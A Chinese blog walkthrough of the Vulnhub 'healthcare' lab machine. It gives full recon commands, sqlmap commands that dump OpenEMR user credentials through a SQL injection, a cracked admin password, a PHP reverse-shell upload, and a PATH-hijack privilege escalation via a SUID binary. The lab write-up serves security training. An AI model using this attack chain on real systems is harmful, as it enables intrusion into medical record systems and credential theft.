healthcare靶机(openEMR管理系统SQL注入漏洞)

最新推荐文章于 2024-03-11 17:22:13 发布
最新推荐文章于 2024-03-11 17:22:13 发布
阅读量509 收藏 2
点赞数
分类专栏: Walkthrough系列 文章标签: sql 数据库 linux 服务器 https
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/128042464
版权

环境准备

靶机链接:百度网盘 请输入提取码b

提取码:822u

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机arp-scan -l

nmap -p- -A -T4 192.168.1.102 //探测目标靶机开放端口和服务

2.用gobuster扫描目录

gobuster dir -u http://192.168.1.102 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -t 50

3.访问网页

漏洞利用

1.查看敏感目录/robots.txt;没有一点用。

2.访问openemr目录是一个登录界面,并且是cms有版本号

http://192.168.1.102/openemr/interface/login/login_frame.php

3.数据库中查找cms漏洞,找到俩个,而且都是SQL注入漏洞

searchsploit openemr

方法一:

1.查看下17998.txt 没啥利用的

2.查看49742.py是一个python脚本,可以利用,只需更改ip 用python3来执行

searchsploit -m 49742.py //保存到本地

3.用python3来执行

4.MD5解码admin ackbar

方法二

sqlmap -u http://192.168.1.102/openemr//interface/login/validateUser.php?u= --dbs
sqlmap -u http://192.168.1.102/openemr//interface/login/validateUser.php?u= -D openemr --tables
sqlmap -u http://192.168.1.102/openemr//interface/login/validateUser.php?u= -D openemr -T users --columns
sqlmap -u http://192.168.1.102/openemr//interface/login/validateUser.php?u= -D openemr -T users -C username,password --dump

1.我这边python提示环境下没有这个目录,用软连接

/usr/bin/env: “python”: 没有那个文件或目录

sudo ln -s /usr/bin/python3 /usr/bin/python

2.查询表名 -D指定数据库名称

u= -D openemr --tables

3.u= -D openemr -T users --columns

4.u= -D openemr -T users -C username,password --dump

5.用爆出的密码登录

6.在files,有一个配置文件可以更改,那么就可以把php-reverse-shell.php(github里有)的代码复制过来

7.开启监听,访问目录,触发木马,成功反弹shell

权限提升

1.用find命令查询到healthcheck,有suid权限

python -c "import pty;pty.spawn('/bin/bash')" //反弹交互式shell

find / -perm -u=s -type f 2>/dev/null //查询以suid权限执行的文件

2.运行后,他的命令,有ifconfig的组成;

3.自己创建一个ifconfig里面写入提权脚本,让ifconfig,优先执行我的ifconfig,只需改变环境变量即可!

export PATH=/tmp:$PATH

4.再次执行healthcheck,就成功提权到root!!!

魏钦6666
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OPENEMRLinux下的安装
曾立文的博客
09-08 906
OPENEMR是开源电子病例记录,Open Source electronic health records 本文介绍其在Linux(ubuntu 18)下的安装。 本文的参考学习链接是:https://www.techrepublic.com/article/how-to-install-the-openemr-medical-software-on-ubuntu-server/ 安装前提条件 开始学习的教程要求安装好了apache2 和PHP,Mysql,如果没有这个条件,请看linux下安装:
数据库大作业/家庭保健信息系统/Home-Healthcare Information System
12-09
数据库大作业/家庭保健信息系统/Home-Healthcare Information System/This assignment is to perform the logic design of an information system. It involves the construction of a DFD, an ER diagram, mapping ...
CVE-2023-28432 MiniO信息泄露漏洞复现
Love&Share
04-28 5065
MiniO 是一个基于 Apache License v2.0 开源协议的对象存储服务。它兼容亚马逊 S3 云存储服务接口,非常适合于存储大容量非结构化的数据,例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等在集群部署的 Minio 中,未授权的攻击者可发送恶意的 HTTP 请求来获取 Minio 环境变量中的敏感信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录 Minio,分布式部署的所有用户都会受到影响,单机用户没有影响。
SQL注入靶机演示)
qq_50646540的博客
09-14 2115
如何安装sqlmap 先安装一个软件,叫sqlmap,用于自动化注入。 下载之后根据需求放进文件夹内,文件夹最好用英文,方便之后创建快捷方式。 将下载下来的sqlmap移动到Python的文件夹下,再在桌面创建快捷方式,将快捷方式的目标改为cmd,起始位置就是Python文件下的sqlmap。完成后可以先测试一下。 在快捷方式的界面中,输入sqlmap.py -h,有下图中的结果就是装好了。 安装好之后就可以开始使用了。 首先,去一个有漏洞的网站试手,我这边是学校里的靶机。 先进行一个测试,在网址后面加
OpenEMR: 开源电子医疗记录系统
gitblog_00005的博客
03-11 402
探索开源医疗系统 OpenEMR OpenEMR 是一个免费、开源的电子健康记录(EHR)和实践管理软件,用于支持医疗保健提供者的需求。它是一个社区驱动的项目,旨在提高医疗服务的质量和效率。 什么是 OpenEMROpenEMR 是一套全面的医疗信息系统,提供了包括患者管理、日程安排、处方开具、账单处理、报告生成等功能。该系统还可以与其他医疗软件和服务集成,以进一步增强功能。 OpenEMR ...
漏洞预警】Laravel <= 8.4.2 Debug模式 _ignition 远程代码执行漏洞
谷子的博客
01-13 1624
2021年1月13日,阿里云应急响应中心监控到国外某安全研究团队披露了Laravel <= 8.4.2 存在远程代码执行漏洞漏洞描述 Laravel 是一个免费的开源 PHP Web 框架,旨在实现的Web软件的MVC架构。2021年1月13日,阿里云应急响应中心监控到国外某安全研究团队披露了 Laravel <= 8.4.2 存在远程代码执行漏洞。当Laravel开启了Debug模式时,由于Laravel自带的Ignition功能的某些接口存在过滤不严,攻击者可以发起恶意请求,通过构造恶意
OpenEMR是最受欢迎的开源电子健康记录和医疗实践管理解决方案。 通过国际使用ONC认证,OpenEMR的目标是与其专有产品相比的替代品。-PHP开发
05-27
OpenEMR OpenEMR是最受欢迎的开源电子健康记录和医疗实践管理解决方案。 OpenEMR的目标是获得国际使用的ONC认证,它的目标是替代其专有的对讲机OpenEMR OpenEMR是最受欢迎的开源电子健康记录和医疗实践管理解决方案。 通过国际使用ONC认证,OpenEMR的目标是与其专有产品相比的替代品。 贡献OpenEMR是医疗保健开源软件的领导者。 昂贵的专有EMR不再是唯一的选择。 了解如何立即开始捐款! 已经对git满意了? 查阅CONTRIBUTING.md以获取快速设置说明。Support Commun
OpenEMR登录模块SQL注入分析
smellycat000的专栏
04-19 381
聚焦源代码安全,网罗国内外最新资讯!OpenEMR简介OpenEMR 是一种免费和开源的医疗实践管理系统(Electronic Health Records,EHR),是 ONC 认证的...
openemrV4.1.0本地靶机获取其webshell
BING
06-07 491
提示:一次简单的渗透测试笔记 渗透目录一、渗透步骤1.首先得到ip过后用nmap扫描开放哪些端口2.根据这个IP地址扫描该地址下开放了哪些目录,用dirsearch工具。3.根据扫描的目录进行访问就会发现openemr下面存在一个登录界面4.然后我用bp抓包发现一个请求地址5.我用sqlmap进行sql注入拿到用户名以及密码6.利用用户户名以及密码登录7.通过寻到有个文件以及php代码上传点,于是我上传了一句话木马![在这里插入图片描述](https://img-blog.csdnimg.cn/202
就医管理系统java源码-iDAAS:DAAS
06-06
就医管理系统java源码这是 iDAAS 平台中央存储库。 它旨在成为内容的启动点,可以到使 iDAAS 成为可扩展平台的所有特定组件和附加工件。 一般而言,任何 iDAAS 组件代码仅用于在利用内容中定义的所需上游软件或...
OpenEMR v2.8.3
05-25
OpenEMR is a free medical practice management, electronic medical records, prescription writing, and medical billing application.
OpenEMR-开源
04-26
OpenEMR是一个开源医疗实践管理应用程序(EHR EMR PMS),具有完全集成的电子健康记录,日程安排,电子账单,国际化,免费支持,充满活力的社区等等。
openemr-5.0.1(开源医疗实践管理应用程序).zip
03-25
OpenEMR OpenEMR是一个开源医疗实践管理应用程序(EHR EMR PMS),具有完全集成的电子健康记录,日程安排,电子账单,国际化,免费支持,充满活力的社区以及更多其他功能。 特征 自由 ONC完全门诊电子病历认证 患者人口统计 病人调度 电子病历 处方药 医疗账单 临床决策规则 患者门户 报告书 多语言支持 安全 免费支持
OpenEMR
02-21
OpenEMR 是最受欢迎的开源电子健康记录和医疗实践管理解决方案。 国际使用的,OpenEMR的目标是其专有竞争对手的替代品。 贡献 OpenEMR是医疗保健开源软件的领导者。 昂贵的专有EMR不再是唯一的选择。 已经对git满意了? 查看以获取快速设置说明 支持 可以在到社区和专业支持。 可以在上到大量的文档和论坛。 报告问题和错误 在上报告这些。 如果您不确定是否是问题/错误,请随时使用和。 报告安全漏洞 发送电子邮件至 。 如果可能,请使用此通过PGP加密您的电子邮件。 API 查看 对于开发人员 如果直接从代码存储库中使用OpenEMR,则以下命令将构建OpenEMR(需要Node.js版本10. *或12. *): composer install --no-dev npm install npm run build composer dump-autoload
healthcare:卫生保健系统的结构化网页
03-06
healthcare:卫生保健系统的结构化网页
IHE是Integrating the Healthcare Enterprise
最新发布
04-20
IHE并不是一个组织,也没有正式命名为标准,而是一个活动,由其发起单位,如北美放射学会(RSNA)、医疗信息管理系统学会(HIMSS)等组织活动。该活动在国际上已经开展的非常广泛和深入,具有相当知名度和影响力。 ...
bmi.rar_BMI_NOO_healthcare _purpose
09-15
this paper suggestion are very nice for purpose of working with data mining in healthcare with body mass index
Vulnhub Healthcare靶机教程
一个努力学习网安的小牛马
10-10 162
Vulnhub靶机 Healthcare 保姆级教程 过程内容详细
个人健身信息管理系统的分析与设计参考文献
05-18
以下是个人健身信息管理系统的分析与设计的参考文献: 1. "Fitness Tracker: A Systematic Review," International Journal of Environmental Research and Public Health, 2018. 2. "Design and Implementation ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值